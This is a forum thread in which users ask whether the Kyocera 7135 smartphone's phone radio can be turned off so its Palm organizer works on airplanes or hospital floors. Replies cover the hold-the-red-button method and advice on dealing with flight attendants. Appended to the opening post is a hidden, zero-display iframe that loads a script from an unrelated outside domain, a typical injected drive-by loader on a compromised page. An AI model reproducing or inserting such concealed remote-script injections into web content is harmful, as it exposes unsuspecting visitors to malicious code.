+ Reply to Thread
Page 1 of 2 1 2 LastLast

Way to turn off phone function on 7135?

Just curious, is there a way to turn off the phone capabilities on the 7135 and just use it as a palm organizer so the 7135 may be used on a plane? Dont want to be transmitting RF on the plane while playing on the 7135<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Way to turn off phone function on 7135?

Press and HOLD the RED/OFF button (just above the 3 KEY) until it says "PHONE IS OFF"

Jeff

Originally posted by i-man
    Just curious, is there a way to turn off the phone capabilities on the 7135 and just use it as a palm organizer so the 7135 may be used on a plane? Dont want to be transmitting RF on the plane while playing on the 7135
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Yes, just like the 6035 all you have to do is hold down 1 button for a few seconds & the phone turns off.

Thanks! My phone should be arriving any second (seconds = days) so this was a questions which has been bouncing around my brain! Thanks and happy new year!

Phone Off, Palm On?

Sorry if this has been asked before, but I didn't know how to search for it without getting hundreds of threads to sort through. So, I'm just wondering.. can the phone be off and the palm be on? Thanks! Might be a dumb question, but I'm really new to the whole smartphone idear... Thanks again.

The Palm part is always on.

Yes, no problem with that. There is a phone off button (just like the 6035).

Using Palm without the cell

[prepurchase question]
    At first this may appear to be a silly question. But, my wife is a nurse and wants to use the palm scheduler at work, but, they are not allowed to have cell phones operating on the floor. Is it possible to disable the cell phone quickly for work, but still use the Palm features?

Re: Using Palm without the cell

Originally posted by Ivan
    [prepurchase question]
    At first this may appear to be a silly question. But, my wife is a nurse and wants to use the palm scheduler at work, but, they are not allowed to have cell phones operating on the floor. Is it possible to disable the cell phone quickly for work, but still use the Palm features?
    Absolutely. You can turn off the phone and the Palm side of the phone will still operate as a normal Palm. She will still be carrying around a phone which may raise questions, but if anyone were to ask, she could show them that it says "phone is off."

Administrator
    thanks for joining I-man and please do a search before you post. im pretty sure everything you may want to know has already been addressed. we have folks on here who have had a 7135 since december! :0

Kyocera 7135 on an airplane

First of all, I admit this may be a dumb question but I really need to know.

The airlines allow you to use a PDA device when you're in-flight but yo cannot use a cell phone. In fact, because of radio interference, you cannot even turn on your cell phone, let alone use it. My question is, do airlines (and/or the FCC, TSA, and other relevant organizations) consider the Kyocera 7135 considered a cell phone or a PDA?

I guess another way of asking the question in a more technical manner is, when you are only using the PDA functions in the Kyocera, does the Kyocera still emit the cell phone radio frequencies that the airlines say interferes with their equipment in flight?

Is it possible to completely turn off the telephone functionality and use the 7135 only as PDA?

:dunno

Check out this thread on point started last February.

http://www.smartphonesource.com/vbul...light=airplane
    ARozansky :wink

Search....search....search....Alanb, where are you......

If your phone is turned off and you are using the PDA part on the plane, if a "waitress in the sky" doesn't believe that the phone part is off, just briefly press the red phone button and it will say in big letters on the screen that the "Phone Is Off".
    ~'kito
    pdaPhoneHome Moderator

Originally posted by davemayo
    Search....search....search....Alanb, where are you......
    I was working on a project all day and just got on the board now. Thanks for covering for me....

Alan

Because it looks like a large flip-phone, my advice would be to leave it off. Arguing with a flight attendant is not a smart thing to do, especially considering the current political climate. Also, if you listen carefully, flight attendants have started saying "devices that use cellular technology" instead of "cellular phones".

If you must use it on a flight, don't push too hard to keep using it. It's not the flight attendant's job to argue with a passenger, and if there's an air-marshal on board, the conversation's tone will quickly change. Pick your battles...

This is a very big concern for me as well. I want to buy this phone very badly before I go on a long, overseas flight in May. I always read books on my PDA when flying and if I can't read on the PDA part of the 7135 because a stewardess thinks the cell phone is on, I will be most unhappy.
    I won't argue with them, but I plan on showing them the red button feature that states the phone is off!

I've had my 7135 for 3 months and have used it on a number of flights for MP3's, playing games and even doing some work. Only once did a FA ask me to turn off my phone. When I showed her the phone said "off" she was satisfied. Other than that, I've had no problems at all. Of course, I agree that it wouldn't be wise to get into an argument about it, but so far it really hasn't been an issue.

Registered User All-Purpose Guru's Avatar
    Originally posted by jsimonson0
    flight attendants have started saying "devices that use cellular technology" instead of "cellular phones".

If you must use it on a flight, don't push too hard to keep using it. It's not the flight attendant's job to argue with a passenger, and if there's an air-marshal on board, the conversation's tone will quickly change. Pick your battles...
    They do that because there are things like the Tungsten W and the latest BlackBerries that use the AT&T GPRS network. Essentially they *are* cellphones.

Remember that you are NOT using the so-called cellular technology if the phone is off. Remember also that the stewardess is the boss, and can make your life pretty ugly if they really feel a need to do so.

I've never had a problem on any airline with my 6035, because I'm very nice and respectful and don't push. Stewardesses that have been working all day and have had to deal with one nasty customer after another appreciate this.

One airline I know of, Iberia, prohibits all electronic devices at all times, period. I knew better than to even ask, at that point, and dug out a pocket book.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

My pleasure.